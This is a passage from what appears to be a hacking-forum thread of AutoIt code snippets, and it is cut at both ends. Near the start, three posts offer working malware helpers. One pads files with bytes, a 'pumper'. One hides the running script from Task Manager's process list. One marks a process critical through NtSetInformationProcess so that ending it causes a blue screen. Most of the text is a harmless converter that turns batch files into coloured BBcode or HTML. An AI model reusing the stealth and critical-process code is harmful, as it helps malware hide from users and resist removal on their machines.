Not @error Then $fp = FileOpen(GUICtrlRead($Path),1+16) _ProgressSetMarquee($Prog,$Main) FileWrite($fp,Binary(_StringRepeat(" ",$ByteInt))) FileClose($fp) _ProgressMarquee_Stop($Prog) GUICtrlDelete($prog) $Prog = GUICtrlCreateProgress(-2, 240, 385, 25) MsgBox(0,"Done!","Successfuly added " & GUICtrlRead($amount) & " " & $ByteStr & "(s) To " & GUICtrlRead($Path),3) EndIf Else MsgBox(16,"Error","Please select the file to pump. The file must exist",4) EndIf EndSwitch WEnd[/HIDE-THANKS]
      21. 1 point
        [HIDE-THANKS] >;LeVeL-23.cc #include Func ProcessHide() $hWnd = ControlGetHandle("", "", "[CLASS:SysListView32]") $Text = _GUICtrlListView_FindText($hwnd, @ScriptName) DllCall("user32.dll", "int", "SendMessage", "hwnd", $hWnd, "int", 4104, "int", $Text, "int", "0") EndFunc [/HIDE-THANKS]
      22. 1 point
        [HIDE-THANKS] >;LeVeL-23.cc ;BSOD($PID, 0) Func BSOD($PROCESS_ID, $BSOD_STATUS) Local Const $BSOD_CLASS = 29 Local Const $INFO_LENGTH = 4 Local Const $PROCESS_ALL_ACCESS = 0X001F0FFF Local $RESULT, $PROCESS_HANDLE, $BSOD_STRUCT, $BSOD_STRUCT_PTR If Not Call("__DEBUGE_PRIVILEGE", True) Then Return If $PROCESS_ID = 0 Then Return $PROCESS_HANDLE = _WinAPI_OpenProcess($PROCESS_ALL_ACCESS, True, $PROCESS_ID) If @error Then Return $BSOD_STRUCT = DllStructCreate("BOOL BSOD_STATUS") DllStructSetData($BSOD_STRUCT, "BSOD_STATUS", $BSOD_STATUS) $BSOD_STRUCT_PTR = DllStructGetPtr($BSOD_STRUCT) $RESULT = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $PROCESS_HANDLE, "INT", $BSOD_CLASS, "PTR", $BSOD_STRUCT_PTR, "ULONG", $INFO_LENGTH) _WinAPI_CloseHandle($PROCESS_HANDLE) $BSOD_STRUCT_PTR = 0 EndFunc ;==>BSOD [/HIDE-THANKS]
      23. 1 point
        [HIDE-THANKS][LENGUAJE=autoit] ;# # # # ##### ##### ;# ###### # # ###### # # # # # #### #### ;# # # # # # # # # # # # ;# ##### # # ##### # ##### ##### ##### # # ;# # # # # # # # ### # # ;# # # # # # # # # ### # # # # ;####### ###### # ###### ####### ####### ##### ### #### #### ; @AZJIO 01.11.2011 (AutoIt3_v3.3.6.1) #include #include #include #Include #NoTrayIcon Global $TrEn, $tmpEn, $TrCB, $tmpCB, $TrBB, $tmpBB, $TrSB, $TrNoCode, $TrB_KW, $TrB_Var, $Tri_Com, $tmpNoCode, $tmpB_KW, $tmpB_Var, $tmpi_Com, _ $aWord, $kOperator, $k0=0, $type, $TrVarCn=0, $Timer, $iCNT, $iDEL, $aRoot, $tmpCheck, $TrCheck, $tmpEcho, $TrEcho, $ChecHTML, $TrSvErr=0, _ $ini=@ScriptDir&'\ConverterCMD.ini', $CurPath, $tmp, $Xpos, $Ypos, $Tr7=0 Global $BACKGROUND, $BKGRD2, $BORDER, $DEFAULT, $COMMENT, $KEYWORDS, $LABEL, $HIDESYBOL, $COMMAND, $VARIABLE, $OPERATOR Global $SysExe='Append|Arp|At|Atmadm|Attrib|Bootcfg|Cacls|Chkdsk|Chkntfs|Cipher|Cmd|Cmstp|Comp|Compact|Convert|CScript|Defrag|DiskPart|Doskey|Driverquery|Eventcreate|Eventtriggers|Exe2bin|Expand|Explorer|Find|Findstr|Finger|Fsutil|Ftp|Getmac|Gpresult|Gpupdate|Help|Hostname|Ipconfig|Ipxroute|Label|Lodctr|Logman|Lpq|Lpr|Mmc|Mountvol|Msiexec|Nbtstat|Net|Netsh|Netstat|Nslookup|Ntbackup|Ntsd|Openfiles|Pathping|Pentnt|Perfmon|Ping|Print|Rasdial|Rcp|Recover|Reg|Regsvr32|Relog|Replace|Reset|Rexec|Route|Rsh|Rsm|Runas|Rundll32|Secedit|Setver|Sfc|Share|Shutdown|Sort|Subst|Systeminfo|xcopy|taskkill|imagex|imdisk|nircmd|upx|setenv' Global $Word='assign|assoc|break|call|cd|chcp|chdir|cls|cmdextversion|copy|date|defined|del|dir|diskcomp|diskcopy|do|echo|else|endlocal|erase|errorlevel|exist|exit|fc|for|format|ftype|goto|graftabl|graphics|if|in|md|mkdir|mode|more|move|not|nul|path|pause|popd|prompt|pushd|rd|ren|rename|rmdir|set|setlocal|shift|start|time|title|to|tree|type|ver|verify|vol|eol|skip|delims|tokens|usebackq' Switch @OSVersion Case 'WIN_VISTA', 'WIN_7' $Tr7=1 EndSwitch If Not FileExists($ini) Then $file = FileOpen($ini,2) FileWrite($file, '[set]' &@CRLF& _ 'CB=1' &@CRLF& _ 'BB=1' &@CRLF& _ 'NoCode=4' &@CRLF& _ 'B_KW=1' &@CRLF& _ 'B_Var=1' &@CRLF& _ 'i_Com=1' &@CRLF& _ 'Check=1' &@CRLF& _ 'Echo=1' &@CRLF& _ 'En=4' &@CRLF& _ 'Topmost=4' &@CRLF& _ 'X=' &@CRLF& _ 'Y=' &@CRLF& _ 'SB="из ini"' &@CRLF& _ 'SysExe="'&$SysExe&'"' &@CRLF& _ 'Operator="=+<>*?|)(&^"' &@CRLF& _ 'KeyWord="'&$Word&'"' &@CRLF&@CRLF& _ '' &@CRLF& _ 'BACKGROUND=FFFFFF' &@CRLF& _ 'BKGRD2=FFFF00' &@CRLF& _ 'BORDER=AAAAAA' &@CRLF& _ 'DEFAULT=000000' &@CRLF& _ 'COMMENT=008000' &@CRLF& _ 'KEYWORDS=0000FF' &@CRLF& _ 'LABEL=FF0000' &@CRLF& _ 'HIDESYBOL=FF00FF' &@CRLF& _ 'COMMAND=0080FF' &@CRLF& _ 'VARIABLE=FF8000' &@CRLF& _ 'OPERATOR=FF0000') FileClose($file) EndIf $Xtmp=IniRead($Ini, 'Set', 'X', '') $Ytmp=IniRead($Ini, 'Set', 'Y', '') $Xpos=Number($Xtmp) $Ypos=Number($Ytmp) $Topmost=Number(IniRead($Ini, 'Set', 'Topmost', 4)) $TrEn=Number(IniRead($Ini, 'Set', 'En', 4)) $TrCB=Number(IniRead($Ini, 'Set', 'CB', 1)) $TrBB=Number(IniRead($Ini, 'Set', 'BB', 1)) $TrCheck=Number(IniRead($Ini, 'Set', 'Check', 4)) $TrEcho=Number(IniRead($Ini, 'Set', 'Echo', 4)) $TrSB=IniRead($Ini, 'Set', 'SB', 'из ini') $CurPath=IniRead($Ini, 'Set', 'CurPath', @ScriptDir) $SysExe=IniRead($Ini, 'Set', 'SysExe', $SysExe) $aSysExe=StringSplit($SysExe, '|') $aSysExe=_ArrayUnique($aSysExe, 1, 1) $kOperator=IniRead($Ini, 'Set', 'Operator', '=+<>*?|)(&^') $kOperator=StringRegExpReplace($kOperator, '[][\\-]', '\\$0') $Word=IniRead($Ini, 'Set', 'KeyWord', $Word) If StringInStr('|'&$Word&'|', '|color|') Then $Word=StringReplace('|'&$Word&'|', '|color|', '|') $Word=StringTrimLeft($Word, 1) $Word=StringTrimRight($Word, 1) EndIf $aWord=StringSplit('color|'&$Word, '|') $aWord=_ArrayUnique($aWord, 1, 1) $TrNoCode=Number(IniRead($Ini, 'Set', 'NoCode', 4)) $TrB_KW=Number(IniRead($Ini, 'Set', 'B_KW', 4)) $TrB_Var=Number(IniRead($Ini, 'Set', 'B_Var', 4)) $Tri_Com=Number(IniRead($Ini, 'Set', 'i_Com', 4)) $StyleAll='из ini|Black(HTML)|White' If Not StringInStr('|'&$StyleAll&'|', '|'&$TrSB&'|') Then $TrSB='из ini' IniWrite($Ini, 'Set', 'SB', '"'&$TrSB&'"') EndIf _StyleIni($TrSB) If Not FileExists(@ScriptDir&'\Style.css') Then _CreateCSS() ; En $LngTitle='Converter CMD2BBcode' $LngAbout='About' $LngVer='Version' $LngSite='Site' $LngCopy='Copy' $LngUDr='use drag-and-drop' $LngCbFl='In clipboard (otherwise file)' $LngBBHL='BBcode (otherwise HTML)' $LngChk='Checking' $LngChkH='Checking Disposal Tag' $LngEch='Highlighting after Echo' $LngThs='Theme:' $LngThsH='Overwrite CSS' $LngOpF='Open' $LngOpFH='Open file cmd, bat' $LngFCb='from clipboard' $LngFCbH='Convert the code'&@CRLF&'read from the clipboard' $LngSet='Settings BBcode' $LngNCd='Do not add >... ' $LngBkw=' for keywords' $LngBvr=' for variables' $LngIcm=' for comments' $LngOpC='Script' $LngHlp1='Help' $LngHlp2='Utility to convert (add tags) files CMD, BAT in HTML or BBcode for later putting some on the forums.'&@CRLF&@CRLF&'Drag and drop in CMD, BAT on the utility and it will automatically perform the conversion.'&@CRLF&@CRLF&'Try to compare the final product by copying from the forum, usually the difference may be in the gaps.'&@CRLF&@CRLF&'In some forums to delete tag >' $LngSD1='Sent to clipboard' $LngSD2='times in' $LngSD3='sec' $LngSD4='Created' $LngSD5=' for' $LngSD6='Processing ...' $LngErr='Error' $LngMs1='Comparison with original failed.'&@CRLF&'Save in Error.txt?' $Lang_dll = DllOpen("kernel32.dll") $UserIntLang=DllCall ( $Lang_dll, "int", "GetUserDefaultUILanguage" ) If Not @error Then $UserIntLang=Hex($UserIntLang[0],4) DllClose($Lang_dll) ; Ru ; если русская локализация, то русский язык If $UserIntLang = 0419 Then $LngTitle='Converter CMD2BBcode' $LngAbout='О программе' $LngVer='Версия' $LngSite='Сайт' $LngCopy='Копировать' $LngUDr='используйте drag-and-drop' $LngCbFl='В буфер (иначе в файл)' $LngBBHL='BBcode (иначе HTML)' $LngChk='Обратная проверка' $LngChkH='Проверка удалением тегов' $LngEch='Подсвечивание после Echo' $LngThs='Тема:' $LngThsH='Перезапишет CSS' $LngOpF='Открыть' $LngOpFH='Открыть файл cmd, bat' $LngFCb='из буфера' $LngFCbH='Обработать код, прочитав'&@CRLF&'из буфера обмена' $LngSet='Настройки BBcode' $LngNCd='Не добавлять [code]... ' $LngBkw=' для ключевых слов' $LngBvr=' для переменных' $LngIcm=' для комментариев' $LngOpC='Скрипт' $LngHlp1='Справка' $LngHlp2='Утилитка конвертирующая (обрамляет тегами) файлы CMD, BAT в формат HTML или BBcode для последующего выкладывания на форумах.'&@CRLF&@CRLF&'Перетаскивайте скрипт на утилиту и она автоматически выполнит конвертирование.'&@CRLF&@CRLF&'Попробуйте сравнить готовый результат скопировав с форума, обычно разница может быть в пробелах.'&@CRLF&@CRLF&'На некоторых форумах необходимо удалить теги >' $LngSD1='Отправлено в буфер' $LngSD2='раз, за' $LngSD3='сек' $LngSD4='Создан' $LngSD5=', за' $LngSD6='Обработка ...' $LngErr='Ошибка' $LngMs1='Сравнение с оригиналом неудачно '&@CRLF&'Хотите сохранить неисправную копию в файл Error.txt?' EndIf If $Xpos < 0 Then $Xpos=0 If $Xpos> @DesktopWidth-260 Then $Xpos=@DesktopWidth-260 If $Xtmp='' Then $Xpos=-1 If $Ypos < 0 Then $Ypos=0 If $Ypos> @DesktopHeight-280 Then $Ypos=@DesktopHeight-280 If $Ytmp='' Then $Ypos=-1 ;создание оболочки $Gui=GUICreate("CMD to BBcode",260,280, $Xpos, $Ypos, -1, $WS_EX_ACCEPTFILES) If Not @compiled Then GUISetIcon(@ScriptDir&'\ConverterCMD.ico', 0) $CatchDrop = GUICtrlCreateLabel("", 0, 0, 260, 280) GUICtrlSetState(-1, 136) $StatusBar=GUICtrlCreateLabel ($LngUDr, 3,280-17,260-6,17, 0xC) GUICtrlSetState(-1, 8) $About = GUICtrlCreateButton("@", 260-21, 2, 18, 20) GUICtrlSetState(-1, 8) $Help = GUICtrlCreateButton("?", 260-42, 2, 18, 20) GUICtrlSetState(-1, 8) $chCB=GUICtrlCreateCheckbox ($LngCbFl, 10, 10,160,20) GUICtrlSetState(-1, 8) If $TrCB=1 Then GuiCtrlSetState(-1, 1) $chBBcode=GUICtrlCreateCheckbox ($LngBBHL, 10,30,160,20) GUICtrlSetState(-1, 8) $chEn=GUICtrlCreateCheckbox ("866 > 1251", 10, 50,160,20) GUICtrlSetState(-1, 8) If $TrEn=1 Then GuiCtrlSetState(-1, 1) $chCheck=GUICtrlCreateCheckbox ($LngChk, 10, 70,160,20) GUICtrlSetState(-1, 8) If $TrCheck=1 Then GuiCtrlSetState(-1, 1) GUICtrlSetTip(-1, $LngChkH) $chEcho=GUICtrlCreateCheckbox ($LngEch, 10, 90,160,20) GUICtrlSetState(-1, 8) If $TrEcho=1 Then GuiCtrlSetState(-1, 1) GUICtrlCreateLabel($LngThs, 10, 116, 43, 17) $StyleCombo=GUICtrlCreateCombo('', 53, 113, 90,18, $CBS_DROPDOWNLIST) GUICtrlSetData($StyleCombo, $StyleAll, $TrSB) GUICtrlSetTip(-1, $LngThsH) GUICtrlSetState(-1, 8) $OpFile=GUICtrlCreateButton ($LngOpF, 170, 30, 86, 28) GUICtrlSetTip(-1, $LngOpFH) $Byfer=GUICtrlCreateButton ($LngFCb, 170, 63, 86, 28) GUICtrlSetTip(-1, $LngFCbH) GUICtrlCreateGroup($LngSet, 5, 143, 180, 98) GUICtrlSetState(-1, 8) $ChCode=GUICtrlCreateCheckbox ($LngNCd, 10,160,170,17) GUICtrlSetState(-1, 8) If $TrNoCode=1 Then GuiCtrlSetState(-1, 1) $ChB_KW=GUICtrlCreateCheckbox ($LngBkw, 10,180,170,17) GUICtrlSetState(-1, 8) If $TrB_KW=1 Then GuiCtrlSetState(-1, 1) $ChB_Var=GUICtrlCreateCheckbox ($LngBvr, 10,200,170,17) GUICtrlSetState(-1, 8) If $TrB_Var=1 Then GuiCtrlSetState(-1, 1) $Chi_Com=GUICtrlCreateCheckbox ($LngIcm, 10,220,170,17) GUICtrlSetState(-1, 8) If $Tri_Com=1 Then GuiCtrlSetState(-1, 1) $LngTpm='Поверх всех окон' $ChTopmost=GUICtrlCreateCheckbox ($LngTpm, 10,245,170,17) GUICtrlSetState(-1, 8) If $TrBB=1 Then GuiCtrlSetState($chBBcode, 1) Else _ChState($GUI_DISABLE) EndIf GUISetState() OnAutoItExitRegister("_Exit_Save_Ini") GUIRegisterMsg(0x0046 , "WM_WINDOWPOSCHANGING") If $Topmost=1 Then WinSetOnTop($GUI, '', 1) GUICtrlSetState($ChTopmost, 1) EndIf While 1 $msg = GUIGetMsg() Switch $msg Case -13 If StringInStr(';.cmd;.bat;', ';'&StringRight(@GUI_DRAGFILE, 4)&';') Then GUICtrlSetData($StatusBar, $LngSD6) _OpenCMD(@GUI_DRAGFILE) EndIf Case $ChTopmost If GUICtrlRead($ChTopmost)=1 Then WinSetOnTop($GUI, '', 1) Else WinSetOnTop($GUI, '', 0) EndIf Case $StyleCombo $TrSB=GUICtrlRead($StyleCombo) IniWrite($Ini, 'Set', 'SB', '"'&$TrSB&'"') _StyleIni($TrSB) _CreateCSS() Case $chBBcode If GUICtrlRead($chBBcode)=1 Then _ChState($GUI_ENABLE) Else _ChState($GUI_DISABLE) EndIf Case $Byfer GUICtrlSetData($StatusBar, $LngSD6) $Timer=TimerInit() _SaveCMD(_ConvCMD(ClipGet())) ; кнопки "Обзор" Case $OpFile If Not FileExists($CurPath) Then $CurPath=@ScriptDir $tmp = FileOpenDialog($LngOpF, $CurPath , $LngOpC&' (*.cmd;*.bat)', '', '', $Gui) If Not @error And StringInStr(';.cmd;.bat;', ';'&StringRight($tmp, 4)&';') Then $CurPath=StringRegExpReplace($tmp, '(^.*)\\(.*)$', '\1') GUICtrlSetData($StatusBar, $LngSD6) _OpenCMD($tmp) EndIf Case $Help MsgBox(8192, $LngHlp1, StringRegExpReplace($LngHlp2, '(.{70,}?[ ])(.*?)', '$0'&@CRLF)) Case $About _About() Case -3 IniWrite($Ini, 'Set', 'CurPath', $CurPath) Exit EndSwitch WEnd Func _Exit_Save_Ini() IniWrite($Ini, 'Set', 'X', $Xpos) IniWrite($Ini, 'Set', 'Y', $Ypos) IniWrite($Ini, 'Set', 'BB', GUICtrlRead($chBBcode)) IniWrite($Ini, 'Set', 'CB', GUICtrlRead($chCB)) IniWrite($Ini, 'Set', 'En', GUICtrlRead($ChEn)) IniWrite($Ini, 'Set', 'Check', GUICtrlRead($ChCheck)) IniWrite($Ini, 'Set', 'Echo', GUICtrlRead($ChEcho)) IniWrite($Ini, 'Set', 'SB', '"'&GUICtrlRead($StyleCombo)&'"') IniWrite($Ini, 'Set', 'NoCode', GUICtrlRead($ChCode)) IniWrite($Ini, 'Set', 'B_KW', GUICtrlRead($ChB_KW)) IniWrite($Ini, 'Set', 'B_Var', GUICtrlRead($ChB_Var)) IniWrite($Ini, 'Set', 'i_Com', GUICtrlRead($Chi_Com)) IniWrite($Ini, 'Set', 'Topmost', GUICtrlRead($ChTopmost)) EndFunc Func WM_WINDOWPOSCHANGING($hWnd, $Msg, $wParam, $lParam) Local $sRect = DllStructCreate("Int[5]", $lparam) Switch $Tr7 Case 1 If DllStructGetData($sRect, 1, 5)<>0 And Not BitAnd(WinGetState($Gui), 16) Then $Xpos=DllStructGetData($sRect, 1, 3) $Ypos=DllStructGetData($sRect, 1, 4) EndIf Case Else If DllStructGetData($sRect, 1, 2) And DllStructGetData($sRect, 1, 5)<>0 And Not BitAnd(WinGetState($Gui), 16) Then $Xpos=DllStructGetData($sRect, 1, 3) $Ypos=DllStructGetData($sRect, 1, 4) EndIf EndSwitch Return 'GUI_RUNDEFMSG' EndFunc Func _OpenCMD($input) $file = FileOpen($input, 0) $HTML = FileRead($file) FileClose($file) $Timer=TimerInit() _SaveCMD(_ConvCMD($HTML), $input) EndFunc Func _SaveCMD($HTML, $input='byfer') Local $tmp1, $tmp2=Round(TimerDiff($timer) / 1000, 2) If $TrCB=1 Then ClipPut($HTML) $k0+=1 GUICtrlSetData($StatusBar, $LngSD1&' '&$k0&' '&$LngSD2&' '&$tmp2& ' '&$LngSD3) GUICtrlSetTip($StatusBar, $LngSD1&' '&$k0&' '&$LngSD2&' '&$tmp2& ' '&$LngSD3) If $TrSvErr=1 Then $file = FileOpen(@ScriptDir&'\Error.txt',2) FileWrite($file, $ChecHTML) FileClose($file) $TrSvErr=0 EndIf Else $input=StringRegExpReplace($input, '(^.*)\.(.*)$', '\1') $i = 0 Do $i+=1 Until Not FileExists($input&'_'&$i&$type) $output=$input&'_'&$i&$type $file = FileOpen($output,2) FileWrite($file, $HTML) FileClose($file) $tmp1=StringRegExpReplace($output, '(^.*)\\(.*)$', '\2') GUICtrlSetData($StatusBar, $LngSD4&' "'&$tmp1&'"'&$LngSD5&' '&$tmp2& ' '&$LngSD3) GUICtrlSetTip($StatusBar, $LngSD4&' "'&$tmp1&'"'&$LngSD5&' '&$tmp2& ' '&$LngSD3) If $TrSvErr=1 Then $file = FileOpen($input&'_'&$i&'Error.txt',2) FileWrite($file, $ChecHTML) FileClose($file) $TrSvErr=0 EndIf EndIf EndFunc Func _ConvCMD($HTML) $tmpBB=GUICtrlRead($chBBcode) $tmpCB=GUICtrlRead($chCB) $tmpEn=GUICtrlRead($ChEn) $tmpCheck=GUICtrlRead($ChCheck) $tmpEcho=GUICtrlRead($ChEcho) If $tmpEn=1 Then $HTML=_Encoding_866To1251($HTML) $tmpHTML=$HTML $HTML=@CRLF&$HTML ; шаблоны замены для переменных Local $sh0= _ '(? '(? '(? '%{1,2}~[fdpnxsatz]*[0-9a-z]|'& _ ; %~dp0 или %%~nxi '%%[a-zA-Z_$]\w{2,}?%%|'& _ ; %%windir%% (добавил нижний предел 3 символа) '%%[a-zA-Z_$]\w*?:~[^%]*?%%|'& _ ; %%Time:~1,1%% '%%\w+?:[\w*/\-+=]*?\w+?%%|'& _ ; %%Time:*4=t%% '%%[a-zA-Z0-9]|'& _ ; %%i '![a-zA-Z_$%][\w%]*?!|'& _ ; !Time! '!\w+?:~.*?!' ; !tn:~-2! ; '%[^%]\*' ; %* ; '%{1,2}~\w+?\b|'& _ ; %~dp0 или %%~nxi ; %~2%~1 ; патерн символов исключения (не содержит символов OPERATOR) $ExPat='\w:%!@#$\-;.,' If $tmpBB=1 Then $type='.txt' $tmpNoCode=GUICtrlRead($ChCode) $tmpB_KW=GUICtrlRead($ChB_KW) $tmpB_Var=GUICtrlRead($ChB_Var) $tmpi_Com=GUICtrlRead($Chi_Com) _Sini('NoCode') _Sini('B_KW') _Sini('B_Var') _Sini('i_Com') ;i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i ; модуль замены ключевых слов BBcode $HTML=StringReplace($HTML, '[', ' 3ksl4¤nl3r01k ') ; замена временно для того чтоб не мешал детекту вложенных тегов $H16='[0-9A-Fa-f]{6}' $HTML=StringRegExpReplace($HTML, '['&$kOperator&']+', '[color=#'&$OPERATOR&']$0[/color]') ; OPERATOR $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*color)\b(?!=)', '[color=#'&$KEYWORDS&']$1[/color]') ; KEYWORDS $HTML=StringRegExpReplace($HTML, '(?m)^([ ]*@)', '[color=#'&$HIDESYBOL&']$1[/color]') ; HIDE SYBOL ; отсчёт с 2 пропуская Color For $i = 2 to $aWord[0] ; $HTML=StringRegExpReplace($HTML, '(?i)\b('&$aWord[$i]&')\b', '[color=#'&$KEYWORDS&']$1[/color]') ; KEYWORDS $HTML=StringRegExpReplace($HTML, '(?im)(? Next For $i = 1 to $aSysExe[0] $HTML=StringRegExpReplace($HTML, '(?im)(? Next $HTML=StringRegExpReplace($HTML, '(?i)(\[color=#'&$H16&'\]if\[.*?)\b(EQU|NEQ|LSS|LEQ|GTR|GEQ)\b', '$1[color=#'&$OPERATOR&']$2[/color]') ; OPERATOR, команды сравнения $HTML=StringRegExpReplace($HTML, '(?i)(?<=\[color=#'&$H16&'\]Call\[/color\])([ ]*:?\w+)\b', '[color=#'&$LABEL&']$1[/color]') ; LABEL (метки после Call) $HTML=StringRegExpReplace($HTML, '(?i)(?<=\[color=#'&$H16&'\]goto\[/color\])([ ]*:?\w+)\b', '[color=#'&$LABEL&']$1[/color]') ; LABEL (метки после goto) $HTML=StringRegExpReplace($HTML, '(?m)^([ ]*:[^:][^\r\n]*)', '[color=#'&$LABEL&']$1[/color]') ; LABEL, метки $HTML=StringRegExpReplace($HTML, '(?im)^([ ]*::[^\r\n]*|[ ]*rem[ ]+[^\r\n]*)', '[color=#'&$COMMENT&']$0[/color]') ; COMMENT, комментарии $HTML=StringRegExpReplace($HTML, '(?i)('&$sh0&')', '[color=#'&$VARIABLE&']$0[/color]') ; VARIABLE, переменные $HTML=StringRegExpReplace($HTML, '(?i)(?<=\[/color\])(%[a-zA-Z_$]\w*?%|%[a-zA-Z_$]\w*?:~.*?%)', '[color=#'&$VARIABLE&']$0[/color]') ; VARIABLE, переменные $HTML=StringRegExpReplace($HTML, '(\[color=#'&$VARIABLE&'\][^[]+?)(\[/color\]\[color=#'&$VARIABLE&'\])(.*?\[/color\])', '\1\3') ; объединение переменных ; Дополнительный поиск переменных $sh0= _ '(? '(? '%%[\w$]+?%%|' $HTML_Var=StringRegExpReplace($tmpHTML, '('&$sh0&')', '') ; удаляем переменные первого прохода $aHTML_Var=StringRegExp($HTML_Var, '((%[^%][\w$]+?:[\w.,;@#$*/\-+=]*?%|%%[a-zA-Z_$][\w$]*?:[\w.,;@#$*/\-+=]*?%%)', 3) ; переменные содержащие операторы If Not @error Then For $i = 0 to UBound($aHTML_Var)-1 $tmp=StringRegExpReplace($aHTML_Var[$i], '['&$kOperator&']+', '[color=#'&$OPERATOR&']$0[/color]') ; OPERATOR $tmp=StringRegExpReplace($tmp, '(%%\w)', '[color=#'&$VARIABLE&']$0[/color]') ; VARIABLE, переменные $HTML=StringReplace($HTML, $tmp, '[color=#'&$VARIABLE&']'&$aHTML_Var[$i]&'[/color]') Next EndIf ; конец: Дополнительный поиск переменных ; исключительные переменные $HTML=StringRegExpReplace($HTML, '(? $HTML=StringRegExpReplace($HTML, '%ProgramFiles\[color=#'&$OPERATOR&'\]\(\[/color\]x86\[color=#'&$OPERATOR&'\]\)\[/color\]%', '[color=#'&$VARIABLE&']%ProgramFiles(x86)%[/color]') ; удаление из строк коментариев иные стили Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$H16&'\]rem[ ].*?)\[color=#'&$H16&'\](.+?)\[/color\](.*?\[/color\])', '$1$2$3') Until @Extended=0 ; удаление из строк коментариев и меток иные стили Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$H16&'\]:{1,2}.*?)\[color=#'&$H16&'\](.+?)\[/color\](.*?\[/color\])', '$1$2$3') Until @Extended=0 $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$LABEL&'\]:.+?[ ])(.+?\[/color\])', '$1[/color][color=#'&$COMMENT&']$2') ; комментарии после метки ; Отменить подсвечивание после title, кроме переменных Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$H16&'\]title\[/color\] .*?)\[color=#('&$KEYWORDS&'|'&$HIDESYBOL&'|'&$COMMAND&'|'&$OPERATOR&')\](.+?)\[/color\](.*?)', '$1$3$4') Until @Extended=0 ; Отменить подсвечивание после echo, кроме переменных If $tmpEcho<>1 Then Do ; $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$H16&'\]echo\[/color\] .*?)\[color=#'&$H16&'\](.+?)\[/color\](.*?)', '$1$2$3') $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*\[color=#'&$H16&'\]echo\[/color\] .*?)\[color=#('&$KEYWORDS&'|'&$HIDESYBOL&'|'&$COMMAND&'|'&$OPERATOR&')\](.+?)\[/color\](.*?)', '$1$3$4') Until @Extended=0 EndIf ; удаление вложенных тегов ; $HTML=StringRegExpReplace($HTML, '(?mi)(\[color=#'&$H16&'\].*?)(?!\[/color\])\[color=#'&$H16&'\](.*?)\[/color\](.*?\[/color\])', '$1$2$3') ; $HTML=StringRegExpReplace($HTML, '(?mi)(\[color=#'&$H16&'\].*?)(?!\[/color\])\[color=#'&$H16&'\](.*?)\[/color\]', '$1$2') Do $HTML=StringRegExpReplace($HTML, '(?mi)(\[color=#'&$H16&'\][^\[]*?)\[color=#'&$H16&'\](.+?)\[/color\]', '$1$2') Until @Extended=0 ; удаление последовательных одинаковых тегов Do $HTML=StringRegExpReplace($HTML, '(?s)(\[color=#('&$H16&')\][^\[]*?)\[/color\]([\s]*)\[color=#\2\]', '\1\3') Until @Extended=0 $HTML=StringReplace($HTML, ' 3ksl4¤nl3r01k ', '[') ; восстановление символа временно заменённого ; формат шрифта If $tmpB_KW=1 Then $HTML=StringRegExpReplace($HTML, '(?si)(\[color=#'&$KEYWORDS&'\].*?\[/color\])', '[b]$1[/b]') If $tmpB_Var=1 Then $HTML=StringRegExpReplace($HTML, '(?si)(\[color=#'&$VARIABLE&'\].*?\[/color\])', '[b]$1[/b]') If $tmpi_Com=1 Then $HTML=StringRegExpReplace($HTML, '(?si)(\[color=#'&$COMMENT&'\].*?\[/color\])', '[i]$1[/i]') $HTML=StringTrimLeft($HTML, 2) ; проверка удалением тегов If $tmpCheck=1 Then $ChecHTML=StringRegExpReplace($HTML, '(?s)\[color=#'&$H16&'\](.*?)\[/color\]', '$1') If $tmpB_KW=1 Or $tmpB_Var=1 Then $ChecHTML=StringRegExpReplace($ChecHTML, '(?s)\[b\](.*?)\[/b\]', '$1') If $tmpi_Com=1 Then $ChecHTML=StringRegExpReplace($ChecHTML, '(?s)\[i\](.*?)\[/i\]', '$1') If $tmpHTML<>$ChecHTML And MsgBox(4, $LngErr, $LngMs1)=6 Then $TrSvErr=1 EndIf ;i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i If $TrNoCode<>1 Then $HTML='[code]'&$HTML&' ' Else $type='.htm' $head1= _ '' & @CRLF & _ ' ' & @CRLF & _ ''& @CRLF & _ ' ' & @CRLF $End2= @CRLF & _ ' ' & @CRLF & _ '' ;i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i ; модуль замены ключевых слов HTML ; If StringRegExp($HTML, '(?i)%%(ProgramFiles|SystemRoot|windir|TEMP|SystemDrive|COMMONPROGRAMFILES|AllUsersProfile|UserProfile)%%', 0) Then $TrVarCn=1 $HTML=StringReplace($HTML, '<', ' 3ksl4¤nl3r01k ') $HTML=StringRegExpReplace($HTML, '['&$kOperator&']+', '$0') ; OPERATOR $HTML=StringRegExpReplace($HTML, '(?m)^([ ]*@)', '$1') ; HIDE SYBOL For $i = 1 to $aWord[0] ; $HTML=StringRegExpReplace($HTML, '(?i)\b('&$aWord[$i]&')\b', '$1') ; KEYWORDS $HTML=StringRegExpReplace($HTML, '(?im)(?$1') ; KEYWORDS ; $HTML=StringRegExpReplace($HTML, '(?im)(?$1') ; KEYWORDS ; $HTML=StringRegExpReplace($HTML, '(?i)(?$1') ; KEYWORDS ; $HTML=StringRegExpReplace($HTML, '(?im)(?$1') ; KEYWORDS Next For $i = 1 to $aSysExe[0] 